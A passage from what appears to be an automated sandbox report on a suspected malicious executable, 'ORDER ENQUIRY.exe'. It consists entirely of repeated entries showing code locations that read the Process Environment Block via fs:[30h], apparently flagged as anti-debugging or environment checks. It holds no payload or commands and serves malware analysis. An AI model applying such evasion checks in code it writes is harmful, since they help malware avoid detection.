          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB07AF mov eax, dword ptr fs:[00000030h]3_2_01AB07AF
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B647A0 mov eax, dword ptr fs:[00000030h]3_2_01B647A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5678E mov eax, dword ptr fs:[00000030h]3_2_01B5678E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD27ED mov eax, dword ptr fs:[00000030h]3_2_01AD27ED
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD27ED mov eax, dword ptr fs:[00000030h]3_2_01AD27ED
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD27ED mov eax, dword ptr fs:[00000030h]3_2_01AD27ED
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB47FB mov eax, dword ptr fs:[00000030h]3_2_01AB47FB
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB47FB mov eax, dword ptr fs:[00000030h]3_2_01AB47FB
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3E7E1 mov eax, dword ptr fs:[00000030h]3_2_01B3E7E1
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABC7C0 mov eax, dword ptr fs:[00000030h]3_2_01ABC7C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B307C3 mov eax, dword ptr fs:[00000030h]3_2_01B307C3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2C730 mov eax, dword ptr fs:[00000030h]3_2_01B2C730
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEC720 mov eax, dword ptr fs:[00000030h]3_2_01AEC720
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEC720 mov eax, dword ptr fs:[00000030h]3_2_01AEC720
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE273C mov eax, dword ptr fs:[00000030h]3_2_01AE273C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE273C mov ecx, dword ptr fs:[00000030h]3_2_01AE273C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE273C mov eax, dword ptr fs:[00000030h]3_2_01AE273C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEC700 mov eax, dword ptr fs:[00000030h]3_2_01AEC700
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB0710 mov eax, dword ptr fs:[00000030h]3_2_01AB0710
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE0710 mov eax, dword ptr fs:[00000030h]3_2_01AE0710
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB8770 mov eax, dword ptr fs:[00000030h]3_2_01AB8770
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE674D mov esi, dword ptr fs:[00000030h]3_2_01AE674D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE674D mov eax, dword ptr fs:[00000030h]3_2_01AE674D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE674D mov eax, dword ptr fs:[00000030h]3_2_01AE674D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B34755 mov eax, dword ptr fs:[00000030h]3_2_01B34755
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3E75D mov eax, dword ptr fs:[00000030h]3_2_01B3E75D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB0750 mov eax, dword ptr fs:[00000030h]3_2_01AB0750
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2750 mov eax, dword ptr fs:[00000030h]3_2_01AF2750
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2750 mov eax, dword ptr fs:[00000030h]3_2_01AF2750
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEC6A6 mov eax, dword ptr fs:[00000030h]3_2_01AEC6A6
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE66B0 mov eax, dword ptr fs:[00000030h]3_2_01AE66B0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB4690 mov eax, dword ptr fs:[00000030h]3_2_01AB4690
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB4690 mov eax, dword ptr fs:[00000030h]3_2_01AB4690
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B2E6F2
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B2E6F2
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B2E6F2
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B2E6F2
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B306F1 mov eax, dword ptr fs:[00000030h]3_2_01B306F1
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B306F1 mov eax, dword ptr fs:[00000030h]3_2_01B306F1
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEA6C7 mov ebx, dword ptr fs:[00000030h]3_2_01AEA6C7
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEA6C7 mov eax, dword ptr fs:[00000030h]3_2_01AEA6C7
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB262C mov eax, dword ptr fs:[00000030h]3_2_01AB262C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ACE627 mov eax, dword ptr fs:[00000030h]3_2_01ACE627
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE6620 mov eax, dword ptr fs:[00000030h]3_2_01AE6620
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE8620 mov eax, dword ptr fs:[00000030h]3_2_01AE8620
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2619 mov eax, dword ptr fs:[00000030h]3_2_01AF2619
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2E609 mov eax, dword ptr fs:[00000030h]3_2_01B2E609
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEA660 mov eax, dword ptr fs:[00000030h]3_2_01AEA660
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEA660 mov eax, dword ptr fs:[00000030h]3_2_01AEA660
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7866E mov eax, dword ptr fs:[00000030h]3_2_01B7866E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7866E mov eax, dword ptr fs:[00000030h]3_2_01B7866E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE2674 mov eax, dword ptr fs:[00000030h]3_2_01AE2674
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ACC640 mov eax, dword ptr fs:[00000030h]3_2_01ACC640
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B389B3 mov esi, dword ptr fs:[00000030h]3_2_01B389B3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B389B3 mov eax, dword ptr fs:[00000030h]3_2_01B389B3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B389B3 mov eax, dword ptr fs:[00000030h]3_2_01B389B3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB09AD mov eax, dword ptr fs:[00000030h]3_2_01AB09AD
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB09AD mov eax, dword ptr fs:[00000030h]3_2_01AB09AD
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3E9E0 mov eax, dword ptr fs:[00000030h]3_2_01B3E9E0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE29F9 mov eax, dword ptr fs:[00000030h]3_2_01AE29F9
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE29F9 mov eax, dword ptr fs:[00000030h]3_2_01AE29F9
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7A9D3 mov eax, dword ptr fs:[00000030h]3_2_01B7A9D3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B469C0 mov eax, dword ptr fs:[00000030h]3_2_01B469C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE49D0 mov eax, dword ptr fs:[00000030h]3_2_01AE49D0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3892A mov eax, dword ptr fs:[00000030h]3_2_01B3892A
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B4892B mov eax, dword ptr fs:[00000030h]3_2_01B4892B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3C912 mov eax, dword ptr fs:[00000030h]3_2_01B3C912
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AA8918 mov eax, dword ptr fs:[00000030h]3_2_01AA8918
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AA8918 mov eax, dword ptr fs:[00000030h]3_2_01AA8918
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2E908 mov eax, dword ptr fs:[00000030h]3_2_01B2E908
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2E908 mov eax, dword ptr fs:[00000030h]3_2_01B2E908
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF096E mov eax, dword ptr fs:[00000030h]3_2_01AF096E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF096E mov edx, dword ptr fs:[00000030h]3_2_01AF096E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF096E mov eax, dword ptr fs:[00000030h]3_2_01AF096E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B54978 mov eax, dword ptr fs:[00000030h]3_2_01B54978
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B54978 mov eax, dword ptr fs:[00000030h]3_2_01B54978
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD6962 mov eax, dword ptr fs:[00000030h]3_2_01AD6962
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD6962 mov eax, dword ptr fs:[00000030h]3_2_01AD6962
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD6962 mov eax, dword ptr fs:[00000030h]3_2_01AD6962
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3C97C mov eax, dword ptr fs:[00000030h]3_2_01B3C97C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B30946 mov eax, dword ptr fs:[00000030h]3_2_01B30946
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B84940 mov eax, dword ptr fs:[00000030h]3_2_01B84940
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB0887 mov eax, dword ptr fs:[00000030h]3_2_01AB0887
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3C89D mov eax, dword ptr fs:[00000030h]3_2_01B3C89D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7A8E4 mov eax, dword ptr fs:[00000030h]3_2_01B7A8E4
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEC8F9 mov eax, dword ptr fs:[00000030h]3_2_01AEC8F9
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEC8F9 mov eax, dword ptr fs:[00000030h]3_2_01AEC8F9
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADE8C0 mov eax, dword ptr fs:[00000030h]3_2_01ADE8C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B808C0 mov eax, dword ptr fs:[00000030h]3_2_01B808C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5483A mov eax, dword ptr fs:[00000030h]3_2_01B5483A
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5483A mov eax, dword ptr fs:[00000030h]3_2_01B5483A
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD2835 mov eax, dword ptr fs:[00000030h]3_2_01AD2835
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD2835 mov eax, dword ptr fs:[00000030h]3_2_01AD2835
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD2835 mov eax, dword ptr fs:[00000030h]3_2_01AD2835
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD2835 mov ecx, dword ptr fs:[00000030h]3_2_01AD2835
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD2835 mov eax, dword ptr fs:[00000030h]3_2_01AD2835
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD2835 mov eax, dword ptr fs:[00000030h]3_2_01AD2835
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEA830 mov eax, dword ptr fs:[00000030h]3_2_01AEA830
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3C810 mov eax, dword ptr fs:[00000030h]3_2_01B3C810
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3E872 mov eax, dword ptr fs:[00000030h]3_2_01B3E872
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3E872 mov eax, dword ptr fs:[00000030h]3_2_01B3E872
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B46870 mov eax, dword ptr fs:[00000030h]3_2_01B46870
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B46870 mov eax, dword ptr fs:[00000030h]3_2_01B46870
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC2840 mov ecx, dword ptr fs:[00000030h]3_2_01AC2840
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB4859 mov eax, dword ptr fs:[00000030h]3_2_01AB4859
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB4859 mov eax, dword ptr fs:[00000030h]3_2_01AB4859
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE0854 mov eax, dword ptr fs:[00000030h]3_2_01AE0854
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B64BB0 mov eax, dword ptr fs:[00000030h]3_2_01B64BB0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B64BB0 mov eax, dword ptr fs:[00000030h]3_2_01B64BB0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0BBE mov eax, dword ptr fs:[00000030h]3_2_01AC0BBE
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0BBE mov eax, dword ptr fs:[00000030h]3_2_01AC0BBE
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3CBF0 mov eax, dword ptr fs:[00000030h]3_2_01B3CBF0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADEBFC mov eax, dword ptr fs:[00000030h]3_2_01ADEBFC
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB8BF0 mov eax, dword ptr fs:[00000030h]3_2_01AB8BF0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB8BF0 mov eax, dword ptr fs:[00000030h]3_2_01AB8BF0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB8BF0 mov eax, dword ptr fs:[00000030h]3_2_01AB8BF0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5EBD0 mov eax, dword ptr fs:[00000030h]3_2_01B5EBD0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB0BCD mov eax, dword ptr fs:[00000030h]3_2_01AB0BCD
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB0BCD mov eax, dword ptr fs:[00000030h]3_2_01AB0BCD
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB0BCD mov eax, dword ptr fs:[00000030h]3_2_01AB0BCD
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD0BCB mov eax, dword ptr fs:[00000030h]3_2_01AD0BCB
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD0BCB mov eax, dword ptr fs:[00000030h]3_2_01AD0BCB
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD0BCB mov eax, dword ptr fs:[00000030h]3_2_01AD0BCB
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADEB20 mov eax, dword ptr fs:[00000030h]3_2_01ADEB20
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADEB20 mov eax, dword ptr fs:[00000030h]3_2_01ADEB20
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B78B28 mov eax, dword ptr fs:[00000030h]3_2_01B78B28
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B78B28 mov eax, dword ptr fs:[00000030h]3_2_01B78B28
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B84B00 mov eax, dword ptr fs:[00000030h]3_2_01B84B00
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AACB7E mov eax, dword ptr fs:[00000030h]3_2_01AACB7E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5EB50 mov eax, dword ptr fs:[00000030h]3_2_01B5EB50
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B82B57 mov eax, dword ptr fs:[00000030h]3_2_01B82B57
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B82B57 mov eax, dword ptr fs:[00000030h]3_2_01B82B57
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B82B57 mov eax, dword ptr fs:[00000030h]3_2_01B82B57
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B82B57 mov eax, dword ptr fs:[00000030h]3_2_01B82B57
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B46B40 mov eax, dword ptr fs:[00000030h]3_2_01B46B40
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B46B40 mov eax, dword ptr fs:[00000030h]3_2_01B46B40
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7AB40 mov eax, dword ptr fs:[00000030h]3_2_01B7AB40
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B58B42 mov eax, dword ptr fs:[00000030h]3_2_01B58B42
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AA8B50 mov eax, dword ptr fs:[00000030h]3_2_01AA8B50
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B64B4B mov eax, dword ptr fs:[00000030h]3_2_01B64B4B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B64B4B mov eax, dword ptr fs:[00000030h]3_2_01B64B4B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB8AA0 mov eax, dword ptr fs:[00000030h]3_2_01AB8AA0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB8AA0 mov eax, dword ptr fs:[00000030h]3_2_01AB8AA0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B06AA4 mov eax, dword ptr fs:[00000030h]3_2_01B06AA4
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
